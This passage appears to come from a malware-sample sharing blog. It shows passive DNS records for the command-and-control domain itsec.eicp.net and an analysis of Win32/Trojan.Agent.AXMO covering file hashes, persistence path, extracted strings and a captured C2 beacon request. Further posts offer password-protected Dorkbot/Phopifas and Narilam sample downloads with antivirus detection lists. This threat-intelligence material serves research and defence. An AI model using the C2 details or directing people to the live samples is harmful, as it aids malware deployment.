last seen 2012-09-13 09:00:10 -0000
itsec.eicp.net. A 123.120.121.80

count 10
first seen 2012-11-29 00:19:53 -0000
last seen 2012-11-29 08:39:53 -0000
itsec.eicp.net. A 123.120.121.149

count 1
first seen 2011-12-26 02:31:38 -0000
last seen 2011-12-26 02:31:38 -0000
itsec.eicp.net. A 123.120.121.164

count 29
first seen 2012-04-16 00:36:01 -0000
last seen 2012-04-16 04:19:43 -0000
itsec.eicp.net. A 123.120.122.3

count 35
first seen 2012-05-15 06:03:10 -0000
last seen 2012-05-15 09:43:28 -0000
itsec.eicp.net. A 123.120.122.46

count 4
first seen 2012-04-28 07:19:34 -0000
last seen 2012-04-28 08:14:00 -0000
itsec.eicp.net. A 123.120.122.88

count 43
first seen 2012-10-12 03:00:01 -0000
last seen 2012-10-12 03:37:02 -0000
itsec.eicp.net. A 123.120.122.102

count 5
first seen 2012-07-29 02:20:03 -0000
last seen 2012-07-29 06:40:01 -0000
itsec.eicp.net. A 123.120.122.118

count 4
first seen 2012-07-16 01:15:01 -0000
last seen 2012-07-16 03:29:59 -0000
itsec.eicp.net. A 123.120.122.141

count 117
first seen 2012-04-13 02:38:31 -0000
last seen 2012-04-13 11:23:26 -0000
itsec.eicp.net. A 123.120.122.146

count 5
first seen 2012-09-27 07:20:06 -0000
last seen 2012-09-27 09:00:07 -0000
itsec.eicp.net. A 123.120.122.158

count 5
first seen 2012-04-12 00:15:21 -0000
last seen 2012-04-12 00:24:19 -0000
itsec.eicp.net. A 123.120.122.201

count 9
first seen 2012-09-14 02:55:38 -0000
last seen 2012-09-14 03:40:10 -0000
itsec.eicp.net. A 123.120.123.46

count 24
first seen 2012-05-11 00:22:25 -0000
last seen 2012-05-11 03:48:51 -0000
itsec.eicp.net. A 123.120.123.82

count 4
first seen 2012-06-13 06:50:05 -0000
last seen 2012-06-13 11:10:29 -0000
itsec.eicp.net. A 123.120.123.125

count 61
first seen 2012-05-09 23:47:45 -0000
last seen 2012-05-10 02:58:23 -0000
itsec.eicp.net. A 123.120.123.184

count 21
first seen 2012-08-01 00:20:01 -0000
last seen 2012-08-01 07:20:01 -0000
itsec.eicp.net. A 123.120.123.186

count 1
first seen 2012-02-17 06:43:29 -0000
last seen 2012-02-17 06:43:29 -0000
itsec.eicp.net. A 123.120.123.229

count 29
first seen 2012-10-26 02:56:22 -0000
last seen 2012-10-26 04:16:22 -0000
itsec.eicp.net. A 123.120.124.16

count 1
first seen 2011-10-09 06:06:33 -0000
last seen 2011-10-09 06:06:33 -0000
itsec.eicp.net. A 123.120.124.33

count 4
first seen 2012-07-31 07:00:00 -0000
last seen 2012-07-31 09:20:01 -0000
itsec.eicp.net. A 123.120.124.41

count 3
first seen 2012-04-09 23:41:17 -0000
last seen 2012-04-09 23:49:46 -0000
itsec.eicp.net. A 123.120.124.43

count 2
first seen 2012-05-02 02:19:39 -0000
last seen 2012-05-02 02:49:37 -0000
itsec.eicp.net. A 123.120.124.55

count 5
first seen 2012-10-23 01:02:52 -0000
last seen 2012-10-23 04:40:09 -0000
itsec.eicp.net. A 123.120.124.74

count 35
first seen 2012-10-18 00:08:44 -0000
last seen 2012-10-18 10:13:14 -0000
itsec.eicp.net. A 123.120.124.149

count 2
first seen 2012-06-25 00:20:03 -0000
last seen 2012-06-25 00:50:03 -0000
itsec.eicp.net. A 123.120.124.165

count 4
first seen 2012-07-11 07:29:58 -0000
last seen 2012-07-11 08:29:59 -0000
itsec.eicp.net. A 123.120.124.168

count 10
first seen 2012-07-29 07:00:12 -0000
last seen 2012-07-29 12:20:02 -0000
itsec.eicp.net. A 123.120.124.197

count 6
first seen 2012-05-08 07:19:33 -0000
last seen 2012-05-08 09:49:33 -0000
itsec.eicp.net. A 123.120.125.4

count 5
first seen 2012-08-03 10:20:01 -0000
last seen 2012-08-03 13:19:59 -0000
itsec.eicp.net. A 123.120.125.156

count 12
first seen 2012-06-12 06:50:06 -0000
last seen 2012-06-12 13:50:05 -0000
itsec.eicp.net. A 123.120.125.225

count 10
first seen 2012-10-02 00:22:10 -0000
last seen 2012-10-02 03:43:44 -0000
itsec.eicp.net. A 123.120.125.226

count 53
first seen 2012-04-17 06:47:00 -0000
last seen 2012-04-17 09:19:42 -0000
itsec.eicp.net. A 123.120.125.245

count 35
first seen 2012-04-09 23:57:04 -0000
last seen 2012-04-10 03:32:06 -0000
itsec.eicp.net. A 123.120.126.23

count 4
first seen 2012-07-27 00:20:02 -0000
last seen 2012-07-27 03:40:02 -0000
itsec.eicp.net. A 123.120.126.56

count 17
first seen 2012-05-17 07:58:47 -0000
last seen 2012-05-17 09:49:23 -0000
itsec.eicp.net. A 123.120.126.60

count 6
first seen 2012-06-29 00:50:00 -0000
last seen 2012-06-29 03:50:00 -0000
itsec.eicp.net. A 123.120.126.86

count 41
first seen 2012-04-27 23:35:11 -0000
last seen 2012-04-28 02:19:35 -0000
itsec.eicp.net. A 123.120.126.103

count 16
first seen 2012-10-31 02:20:09 -0000
last seen 2012-10-31 08:20:07 -0000
itsec.eicp.net. A 123.120.126.116

count 13
first seen 2012-11-04 23:57:18 -0000
last seen 2012-11-05 10:40:04 -0000
itsec.eicp.net. A 123.120.126.127

count 159
first seen 2012-09-21 00:49:28 -0000
last seen 2012-09-21 03:11:04 -0000
itsec.eicp.net. A 123.120.126.139

count 14
first seen 2012-11-22 00:39:57 -0000
last seen 2012-11-22 07:39:55 -0000
itsec.eicp.net. A 123.120.126.140

count 3
first seen 2012-07-27 07:40:02 -0000
last seen 2012-07-27 10:00:03 -0000
itsec.eicp.net. A 123.120.126.163

count 33
first seen 2012-04-23 00:49:38 -0000
last seen 2012-04-23 15:03:53 -0000
itsec.eicp.net. A 123.120.126.186

count 5
first seen 2012-09-20 07:40:08 -0000
last seen 2012-09-20 13:40:07 -0000
itsec.eicp.net. A 123.120.126.225

count 48
first seen 2012-06-15 01:20:03 -0000
last seen 2012-06-15 04:20:03 -0000
itsec.eicp.net. A 123.120.127.23

count 5
first seen 2012-11-12 00:00:01 -0000
last seen 2012-11-12 06:40:00 -0000
itsec.eicp.net. A 123.120.127.59

count 1
first seen 2012-05-25 09:19:18 -0000
last seen 2012-05-25 09:19:18 -0000
itsec.eicp.net. A 123.120.127.87

count 2
first seen 2012-08-02 00:20:03 -0000
last seen 2012-08-02 03:20:03 -0000
itsec.eicp.net. A 123.120.127.143

count 82
first seen 2012-11-28 00:19:54 -0000
last seen 2012-11-28 23:39:54 -0000
itsec.eicp.net. A 123.120.127.160

count 9
first seen 2012-11-20 23:59:56 -0000
last seen 2012-11-21 09:39:56 -0000
itsec.eicp.net. A 123.120.127.210

count 44
first seen 2012-04-11 00:51:02 -0000
last seen 2012-04-11 09:14:49 -0000
itsec.eicp.net. A 204.16.193.12

count 1677
first seen 2011-09-01 01:38:29 -0000
last seen 2012-12-04 05:00:22 -0000
itsec.eicp.net. A 209.11.241.144

Win32/Trojan.Agent.AXMO

The Windows pcap has October 2012 timestamps due to wrong time / date in the sandbox vm, please disregard, it is actually Nov.30, 2012.

File: file.tmp
Size: 61435
MD5: C3432C1BBDF17EBAF1E10392CF630847

File: install.jar

Size: 39181

MD5: 44A67E980F49E9E2BED97ECE130F8592

contents

7EBAF1E10392CF630847\INSTALL
│ bbb.class
│ ccc.class
│ file.tmp
│
└───META-INF
MANIFEST.MF

C\Documents and Settings\Laura\Start Menu\Programs\Startup\winupdate.exe

File: winupdate.exe
Size: 61435
MD5: C3432C1BBDF17EBAF1E10392CF630847- Virustotal
https://www.virustotal.com/file/4d89364a1ee4c3d14102631d9807764dc538df4e85c91912252baca0c45ea484/analysis/

ASCI Strings

KERNEL32.DLL
Button
Allow
Identity Protection
Allow for all
AVG Firewall Asks for Confirmation
Load
Software\Microsoft\Windows\CurrentVersion\Run
0x1A7B4C9F
CorExitProcess
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
R6033
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
R6032
- not enough space for locale information
R6031
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
R6030
- CRT not initialized
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
R6010
- abort() has been called
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point support not loaded
8j@
@i@
@h@
xg@
(g@
Hf@
xb@
\b@
@b@
8b@
@Microsoft Visual C++ Runtime Library
...
<program name unknown>
Runtime Error!
Program:
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
USER32.DLL
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Dec
Nov
Oct
Sep
Aug
Jul
Jun
May
Apr
Mar
Feb
Jan
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
Sat
Fri
Thu
Wed
Tue
Mon
Sun
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Dec
Nov
Oct
Sep
Aug
Jul
Jun
May
Apr
Mar
Feb
Jan
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
Sat
Fri
Thu
Wed
Tue
Mon
Sun
((((( H
h(((( H
H
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
"/@
&/@
a6@
)@@
qH@
lstrlenA
VirtualFree
ReadFile
SetFilePointer
GetFileSize
CreateFileA
CloseHandle
GetLastError
CreateMutexA
KERNEL32.dll
GetCommandLineA
HeapSetInformation
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
GetProcAddress
GetModuleHandleW
ExitProcess
DecodePointer
WriteFile
GetStdHandle
GetModuleFileNameW
GetModuleFileNameA
WideCharToMultiByte
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
DeleteCriticalSection
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
HeapCreate
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
LeaveCriticalSection
EnterCriticalSection
LoadLibraryW
HeapFree
Sleep
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
RtlUnwind
HeapSize
HeapAlloc
HeapReAlloc
LCMapStringW
MultiByteToWideChar
GetStringTypeW

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ

abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
|p@
tp@
lp@
`p@
Tp@
Lp@
@p@
<p@
8p@
4p@
0p@
,p@
(p@
$p@
p@
,p@
to@
lo@
do@
\o@
To@
Lo@
Do@
<o@
,o@
xn@
pn@
hn@
`n@
Pn@
<n@
0n@
$n@
dm@
Pm@
(v@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
1*151@1K1U1Z1k1v1
2 2?2E2{2
3!3@3F3
4#4/4;4C4L4Y4g4w4
555<5I5j5w5
5&6?6]6q6
607
8Z8_8i8
8*90969<9B9H9O9V9]9d9k9r9y9
:1;7;D;J;S;Z;|;
<.<8<=<Y<c<y<
=A=H=b=i=
=6>I>[>
>/?<?Q?
2 2*2;2F2
4%4*404
425>5X5~5
6V6`6
7'7U7x7~7
8!8-838;8A8M8S8`8j8p8z8
9G9M9S9i9
9!:D:N:
; ;(;/;4;<;E;Q;V;[;a;e;k;p;v;{;
<5<Y<e<q<
=N>h>
?<?B?G?S?Z?d?v?
0@0
1#1R1X1`1
2r2{2
3'393
4#404n4u4
5;5N5U5]5
6.6
6H7M7_7}7
9&9/9:9?9H9R9]9
< <
=C=L=X=
>$>
0_0g0|0
1A1x1
102M2
3$3
4%4A4J4P4Y4^4m4
4M5
506
6G7u7
8Q8
9::l:
; ;$;(;,;0;z;
<$<(<,<M<w<
= =$=(=
>#>
?$?0?g?
{0K1
2l6~6
7"747F7X7j7|7
7A8M8
8n:
;$;,;4;<;D;
8$9(9H9h9t9
:4:8:X:x:
3H7H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
:(:8:H:l:x:|:
u{}r
ffhfffofff
effKfffHbffGfff=bff2
ffffffgfff
WPH
ffffff
ffffffffffff
ffffffffffff
ffffffffff
Qffffffffffff
ffffffff
ffffffff:"
fffffffffffffffffffffffffffffffffffffffffffffffffffff
\RRUffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffV\^VffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffV\^VffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffV\^VffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffV\^VffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffRRUfffffffffffffefffefffffffffffgdffgfffgdffdfffggffeffffgffbfffggffcfffgdff`ffffgffafffgdffnfffggffofffgefflfffgeffmfffgeffjfffgeffkfffgeffffffffffqfffgfff
fffffffffffffO
oXZ
4XY
,Sc
ff!
!fOff
ffFf
!fOffa
ff%f
!fOff
!fOff>
ff4e
!fOff
!fOff
ff.fp
fOf
T#xY
;FC
.]km
pB!3
2_ws
M32crsvadt
piva
u32r3semp2
f,Z
fqq
Iff
q2.
fqff
qnIq
qvw
q*Iq
f{r
XZY5A
gl]
gsY
Vj9
23016A45boB
.iot
oniinptpt
f,f
f,f
pV,
n[/g
YogjY
gs]
SARTWMiE\oscrt\ofndWis\owrrCutVensier\Ionerntt nettSegsinro
PEnxyleabro
PSexyerrvtt
Z[XYFGDE
HINO
23016745:;89>
!&'$%*S()VWTUBC@A^_\]bc`afgdejkh
nstlm
qupz
BC@AFGDEJK"INOLMR
!# H&'$%*+().0,-3/126745:;89>
VWTU
[XZ
\]bc
hiopmnstqrwxuv
!"%
<()&',.*+-1/052348967$>:#AB
?DF@C
*j=
*j=
*j=
*j=
*j=
,e5
f,f
f,f
8f,
f,f
f,f
f,f
M_C
atreogeLreTh
Q`y
_!$
Ya^3r
rnke32elll.dni
IaltieCiztirilScatiec
IZ!f
gnY
gsY/g
[n]gi
gl]
/In
rnke32elll.dni
IaltieCiztirilScatiec
onu
K nh
K nh
[nh
{a_
{Y<
cIvGJe
nlwionogxe.eIN
WGOLOEXN.sfE
dlc.sfl
osc_ll.dRQ
Yhj2
CYZ_^
VWRQ
rttaSY %EMSTOTROsy%\emst
C321.:\t
ba67cdBCB1
hVj
Ph3
Pjj
3VW
G f0f
PA3
e@H
:VWj
^Y]_
0dg@
t2P
3P3
4CX
j=A
V67
OdV
i3gddl2.Crl
teeaA
DCtDGeicevapeCCrs
teeampCoibatDClere
CeCatpaombltiiteBp
maleSeObctctjeit
BltOGeecbj
GtAStetkOocecbjSet
ctlelePae
ttalReePizetal
GteDIettsBiel
DeOetecbjDet
tele
DDCPLIS
WAYStin
Da0auef
Q!Jy
,},y
f,f,
f,f
f,f,
YnzKX
!,I
!,]
%,Q
%,m
_3s2dl2.wil
ownddls.nol
e0isat.dub
sdas.ret
.dgs
satr.sgt
dandwis.onl
dlplexerorxe.etf
cn.moe
exnwwim.ore
ff1da
a<f
a<f
e=f
a=f

POST /8801000000/log HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Host: itsec.eicp.net:443
Content-Length: 96
Proxy-Connection: Keep-Alive
....+,-....0........M?<.[DXFGHI....NOP.B.d..C\if3H56.I8:;<8?$...lus|.~.FTMKDOIA.$=;4?!)*450<7..

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32
Server: Microsoft-IIS/6.0

....+,-....0.......&5YuUZB..UH..

Download pcap

↧

Oct 2012 - Skype Dorkbot / W32.Phopifas samples

December 6, 2012, 6:49 pm

≫ Next: Nov 2012 - W32.Narilam Sample

≪ Previous: OSX/Dockster.A and Win32/Trojan.Agent.AXMO Samples, pcaps, OSX malware analysis tools

End of the year presents:
These are 4 samples of Skype Dorkbot / W32.Phopifas
Related News and Analysis:
October 2012
Infection Spreads Profile Pic Messages to Skype Users -GFI
W32.Phopifas | Symantec

Download

Download. (Email me if you need the password scheme - see profile for email)

Files

926B749219E33D4EF2D8996DCCE22354
88E635876F20CDB681CA0EDD31D5ACB5
B8CD29A76DA2E4747FF9DE8C1DC5202B
F84178426AB688EA35EC4D96D18537F9

Automatic scans

https://www.virustotal.com/file/a36b74c64b85605b79f662821cd455eb96449a3c4e35fd3eaac7a6e40f87a38b/analysis/1354847521/
SHA256:a36b74c64b85605b79f662821cd455eb96449a3c4e35fd3eaac7a6e40f87a38b
SHA1:34d48ccea4a619408064f133cb49c5036c75509b
MD5:88e635876f20cdb681ca0edd31d5acb5
File size:32.0 KB ( 32768 bytes )
File name:8E635876F20CDB681CA0EDD31D5ACB5

File type:Win32 EXE
Detection ratio:31 / 42
Analysis date: 2012-12-07 02:32:01 UTC ( 1 minute ago )
00

Additional information
AntivirusResultUpdate
AgnitumWorm.Rodpicom!/SOsrYJpUIk20121206
AntiVirTR/Bublik.I20121207
AvastWin32:Crypt-NXP [Trj]20121207
AVGDownloader.Generic13.LGV20121207
BitDefenderWin32.Floppier.A20121206
CAT-QuickHealTrojanDropper.Agent.hdfl20121206
ClamAV-20121207
ComodoUnclassifiedMalware20121206
EmsisoftWin32.Floppier.A (B)20121207
eSafe-20121205
ESET-NOD32Win32/Rodpicom.A20121206
F-Prot-20121206
FortinetW32/Boberog.AZ!tr20121207
GDataWin32.Floppier.A20121207
IkarusVirus.Win32.CeeInject20121206
JiangminTrojan/Generic.avgzr20121206
K7AntiVirusRiskware20121206
KasperskyTrojan-Dropper.Win32.Agent.hdfl20121206
KingsoftWin32.Troj.Yakes.(kcloud)20121206
McAfeeGeneric.dx!bgcd20121207
McAfee-GW-EditionGeneric.dx!bgcd20121206
MicrosoftWorm:Win32/Dorkbot.AK20121207
MicroWorld-eScanWin32.Floppier.A20121206
NANO-AntivirusTrojan.Win32.Spamlink.ziaze20121207
NormanW32/Troj_Generic.EUPTJ20121206
nProtectTrojan/W32.Agent.32768.CEQ20121207
PandaTrj/CI.A20121206
PCToolsMalware.Phopifas20121207
SUPERAntiSpywareTrojan.Agent/Gen-Floppier20121207
SymantecW32.Phopifas20121207
TheHackerTrojan/Rodpicom.a20121207
TrendMicro-HouseCallWORM_DORKBOT.IF20121207
VIPRETrojan.Win32.Generic!BT20121206
ViRobotTrojan.Win32.A.Yakes.24064.L20121206

https://www.virustotal.com/file/7e2cc281dd8c4df94b7bdba4d5517254064714444c17abd646d8b5a40033212d/analysis/1354847560/
SHA256:7e2cc281dd8c4df94b7bdba4d5517254064714444c17abd646d8b5a40033212d
SHA1:6431a1b536bd623fef398dbea10baaa688b85ea5
MD5:926b749219e33d4ef2d8996dcce22354
File size:23.5 KB ( 24064 bytes )
File name:2014DB56271F0712808AF5600BB8BF73.exe
File type:Win32 EXE
Detection ratio:37 / 46
Analysis date: 2012-12-07 02:32:40 UTC ( 0 minutes ago )

AgnitumWorm.Rodpicom!/SOsrYJpUIk20121206
AhnLab-V3ASD.Prevention20121206
AntiVirTR/Bublik.I20121207
Antiy-AVL-20121204
AvastWin32:Crypt-NXP [Trj]20121207
AVGDownloader.Generic13.LGV20121207
BitDefenderWin32.Floppier.A20121206
ByteHero-20121130
CAT-QuickHealWorm.Dorkbot.gen20121206
ClamAV-20121207
Commtouch-20121206
Comodo-20121206
DrWebTrojan.Spamlink.320121207
EmsisoftTrojan.Win32.Agent.AMN (A)20121207
eSafe-20121205
ESET-NOD32Win32/Rodpicom.A20121206
F-Prot-20121206
F-SecureWin32.Floppier.A20121207
FortinetW32/Agent.YDD!tr20121207
GDataWin32.Floppier.A20121207
IkarusVirus.Win32.CeeInject20121206
JiangminTrojan/Generic.avgzr20121206
K7AntiVirusRiskware20121206
KasperskyTrojan.Win32.Yakes.bgft20121206
KingsoftWin32.Troj.Yakes.(kcloud)20121206
MalwarebytesTrojan.Agent20121207
McAfeeGeneric.dx!bgbb20121207
McAfee-GW-EditionGeneric.dx!bgbb20121206
MicrosoftWorm:Win32/Dorkbot.AK20121207
MicroWorld-eScanWin32.Floppier.A20121206
NANO-AntivirusTrojan.Win32.Spamlink.ziaze20121207
NormanW32/Troj_Generic.EQRMN20121206
nProtectWin32.Floppier.A20121207
PandaTrj/OCJ.A20121206
PCToolsMalware.Phopifas20121207
Rising-20121206
SophosTroj/Agent-YDD20121207
SUPERAntiSpywareTrojan.Agent/Gen-Floppier20121207
SymantecW32.Phopifas20121207
TheHackerTrojan/Rodpicom.a20121207
TotalDefense-20121206
TrendMicroWORM_DORKBOT.IF20121207
TrendMicro-HouseCallWORM_DORKBOT.IF20121207
VBA32Trojan.MTE.0167620121205
VIPRETrojan.Win32.Generic!BT20121206
ViRobotTrojan.Win32.A.Yakes.24064.L20121206

https://www.virustotal.com/file/076c65bfb4a6b15f7af11e4714945bd6c599a78b98e07c59febabbc0b7dc256b/analysis/1354847573/
HA256:076c65bfb4a6b15f7af11e4714945bd6c599a78b98e07c59febabbc0b7dc256b
SHA1:35f89a167ea5ff0ea1d35824dda9e48bfa8521d4
MD5:b8cd29a76da2e4747ff9de8c1dc5202b
File size:79.5 KB ( 81408 bytes )
File name:B8CD29A76DA2E4747FF9DE8C1DC5202B.exe_
File type:Win32 EXE
Detection ratio:36 / 44
Analysis date: 2012-12-07 02:32:53 UTC ( 1 minute ago )

AntivirusResultUpdate
Agnitum-20121206
AhnLab-V3Spyware/Win32.Zbot20121206
AntiVirTR/Dropper.Gen720121207
Antiy-AVL-20121204
AvastWin32:Trojan-gen20121207
AVGCrypt.BAND20121207
BitDefenderWorm.Generic.39681220121206
ByteHero-20121130
CAT-QuickHealTrojan.Agent.gen20121206
ClamAV-20121207
Commtouch-20121206
ComodoUnclassifiedMalware20121206
EmsisoftTrojan.Win32.AMN (A)20121207
eSafe-20121205
ESET-NOD32Win32/Rodpicom.B20121206
F-Prot-20121206
F-SecureWorm.Generic.39681220121207
FortinetW32/Menti.OSIU!tr20121207
GDataWorm.Generic.39681220121207
IkarusWin32.LockScreen20121206
JiangminTrojan/Menti.aeyw20121206
K7AntiVirusTrojan20121206
KasperskyTrojan.Win32.Menti.osiu20121206
KingsoftWin32.Troj.Undef.(kcloud)20121206
MalwarebytesTrojan.Ransom.ANC20121207
McAfeeRansom-ABD.gen.a20121207
McAfee-GW-EditionRansom-ABD.gen.a20121206
MicrosoftWorm:Win32/Dorkbot20121207
MicroWorld-eScanWorm.Generic.39681220121206
NANO-AntivirusTrojan.Win32.Menti.zvsvl20121207
NormanW32/Troj_Generic.EVDFK20121206
nProtectTrojan/W32.Agent.81408.UO20121207
PandaTrj/OCJ.A20121206
PCToolsMalware.Phopifas20121207
Rising-20121206
SophosTroj/Inject-ZP20121207
SUPERAntiSpywareTrojan.Agent/Gen-Menti20121207
SymantecW32.Phopifas20121207
TheHackerTrojan/Rodpicom.b20121207
TotalDefenseWin32/Ransom.ATQ20121206
TrendMicroWORM_DORKBOT.IF20121207
TrendMicro-HouseCallWORM_DORKBOT.IF20121207
VIPRETrojan.Win32.Generic!BT20121206
ViRobotTrojan.Win32.A.Menti.81408.G20121206

https://www.virustotal.com/file/d0aae118322c403d6a52fbb53efea03f654720b67a827055d55e76e1b0dcfa86/analysis/1354847589/
HA256:d0aae118322c403d6a52fbb53efea03f654720b67a827055d55e76e1b0dcfa86
SHA1:843f429035cf7196669e79303de716d94e550794
MD5:f84178426ab688ea35ec4d96d18537f9
File size:95.0 KB ( 97280 bytes )
File name:F84178426AB688EA35EC4D96D18537F9.exe_
File type:Win32 EXE
Detection ratio:36 / 45
Analysis date: 2012-12-07 02:33:09 UTC ( 1 minute ago )

AntivirusResultUpdate
Agnitum-20121206
AntiVirTR/Obfuscate.acgmo20121207
Antiy-AVL-20121204
AvastWin32:Dofoil-AX [Trj]20121207
AVGPSW.Generic10.AAXX20121207
BitDefenderTrojan.Generic.KDV.76340820121206
ByteHero-20121130
CAT-QuickHealTrojan.PornoAsset.anf20121206
ClamAV-20121207
CommtouchW32/Falab.F18.gen!Eldorado20121206
ComodoTrojWare.Win32.Kryptik.NEGB20121206
DrWebBackDoor.IRC.NgrBot.4220121207
EmsisoftTrojan.Generic.KDV.763408 (B)20121207
eSafe-20121205
ESET-NOD32Win32/Dorkbot.B20121206
F-ProtW32/Falab.F18.gen!Eldorado20121206
F-SecureTrojan.Generic.KDV.76340820121207
FortinetW32/PornoAsset.ANFK!tr20121207
GDataTrojan.Generic.KDV.76340820121207
IkarusWorm.Win32.Cridex20121206
JiangminTrojan/PornoAsset.itl20121206
K7AntiVirusTrojan20121206
KasperskyTrojan-Ransom.Win32.PornoAsset.anfk20121206
KingsoftWin32.Troj.Undef.(kcloud)20121206
MalwarebytesTrojan.Winlock20121207
McAfeePWS-Zbot.gen.anq20121207
McAfee-GW-EditionPWS-Zbot.gen.anq20121206
MicrosoftVirTool:Win32/Obfuscator.ACG20121207
MicroWorld-eScanTrojan.Generic.KDV.76340820121206
NANO-AntivirusTrojan.Win32.Obfuscate.zureo20121207
NormanW32/FakeAV.BJTL20121206
nProtectTrojan.Generic.KDV.76340820121207
PandaTrj/OCJ.A20121206
PCToolsTrojan.IRCBot20121207
Rising-20121206
SophosMal/ZboCheMan-D20121207
SUPERAntiSpyware-20121207
SymantecW32.IRCBot.NG20121207
TheHacker-20121207
TotalDefense-20121206
TrendMicroWORM_DORKBOT.IF20121207
TrendMicro-HouseCallWORM_DORKBOT.IF20121207
VBA32BScope.Worm.NgrBot.181220121205
VIPRETrojan.Win32.Generic!BT20121206
ViRobotTrojan.Win32.A.PornoAsset.97280.R20121206

↧

Nov 2012 - W32.Narilam Sample

December 6, 2012, 7:12 pm

≫ Next: Aug 2012 Backdoor.Wirenet - OSX and Linux

≪ Previous: Oct 2012 - Skype Dorkbot / W32.Phopifas samples

End of the year presents:
This is a sample of W32.Narilam

Related News and Analysis:
Nov 2012 (malware is much older but re-surfaced in Nov 2012)
W32.Narilam – Business Database Sabotage
W32.Narilam | Symantec

Download

Download. (Email me if you need the password scheme - see profile for email)
sample credit anonymous

Files

File: data.exe_

Size: 1629184

MD5: 8E63C306E95843ECCAB53DAD31B3A98B

Automatic scans

https://www.virustotal.com/file/cf3c015d828784c7dffcba80619dba4cba970680ea5aa9f42f7356e79643a749/analysis/

SHA256:cf3c015d828784c7dffcba80619dba4cba970680ea5aa9f42f7356e79643a749
SHA1:b7462e83cd81fcbee7b799e230bed19331c9d516
MD5:8e63c306e95843eccab53dad31b3a98b
File size:1.6 MB ( 1629184 bytes )
File name:Data.exe
File type:Win32 EXE
Tags:peexe
Detection ratio:32 / 43
Analysis date: 2012-11-26 12:06:30 UTC ( 1 week, 3 days ago )

Additional information
Behavioural information
AntivirusResultUpdate
AgnitumWorm.Agent!nmyuAQJx1Sc20121125
AhnLab-V3Trojan/Win32.Scar20121125
AntiVirTR/Crypt.CFI.Gen20121126
AvastWin32:Rootkit-gen [Rtk]20121126
AVGunknown virus Win32/DH{LmQDYmcJDw}20121126
BitDefenderGen:Variant.Zusy.Elzob.914920121126
ComodoUnclassifiedMalware20121126
DrWebTrojan.Siggen4.3980320121126
EmsisoftGen:Variant.Zusy.Elzob.9149 (B)20121126
ESET-NOD32Win32/Agent.NEN20121126
F-SecureGen:Variant.Zusy.Elzob.914920121126
FortinetW32/Agent.CB!tr20121126
GDataGen:Variant.Zusy.Elzob.914920121126
IkarusVirus.Win32.Virut20121126
JiangminTrojan/Scar.dtc20121126
K7AntiVirusRiskware20121124
KasperskyWorm.Win32.Narilam.b20121126
KingsoftWin32.Troj.Generic_01.k20121119
McAfeeGeneric BackDoor.wc20121126
McAfee-GW-EditionHeuristic.LooksLike.Win32.Suspicious.J!8620121126
MicrosoftTrojan:Win32/Delfsnif.DU20121126
MicroWorld-eScan-20121126
NormanW32/Obfuscated.H3!genr20121126
PandaTrj/Scar.AB20121125
RisingWorm.Win32.VobfusEx.e20121126
SophosMal/Banker-CB20121126
SUPERAntiSpywareTrojan.Agent/Gen-Falint20121126
SymantecW32.Narilam20121126
TotalDefenseWin32/FakeFLDR_i20121125
TrendMicroMal_OtorunN20121126
TrendMicro-HouseCallMal_OtorunN20121126
VBA32Trojan.FakeFolder.194120121124
ViRobotTrojan.Win32.A.Scar.1569280

↧